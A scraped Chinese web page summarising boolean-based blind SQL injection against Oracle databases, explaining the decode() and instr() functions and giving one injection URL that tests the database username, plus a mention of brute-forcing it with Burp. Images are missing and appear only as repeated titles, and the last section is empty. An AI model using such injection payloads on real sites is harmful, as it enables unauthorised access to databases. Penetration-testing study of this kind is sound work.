加入收藏 | 设为首页 | 会员中心 | 我要投稿 PHP编程网 - 黄冈站长网 (http://www.0713zz.com/)- 数据应用、建站、人体识别、智能机器人、语音技术!
当前位置: 首页 > 百科 > 正文

Oracle基于布尔的盲注总结

发布时间:2021-03-08 08:14:02 所属栏目:百科 来源:网络整理
导读:副标题#e# 0x01 decode?函数布尔盲注 decode(字段或字段的运算,值1,值2,值3) 这个函数运行的结果是,当字段或字段的运算的值等于值1时,该函数返回值2,否则返回3 当然值1,值2,值3也可以是表达式,这个函数使得某些sql语句简单了许多 使用方法: 比较

Oracle基于布尔的盲注总结

Oracle基于布尔的盲注总结

Oracle基于布尔的盲注总结

?

?

?0x02?instr函数布尔盲注

instr函数的使用,从一个字符串中查找指定子串的位置。例如:

SQL> select instr(‘abcdefgh‘,‘de‘) position from dual;

POSITION
----------
4

?

Oracle基于布尔的盲注总结

从1开始算 d排第四所以返回4

盲注中的应用:

http://www.jsporcle.com/news.jsp?id=1 and 1=(instr((select user from dual),‘SYS‘)) --

Oracle基于布尔的盲注总结

?

?BURP爆破用户名

Oracle基于布尔的盲注总结

?

?

?

?

0x03?通用盲注方法?逐字猜解

(编辑:PHP编程网 - 黄冈站长网)

【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!

热点阅读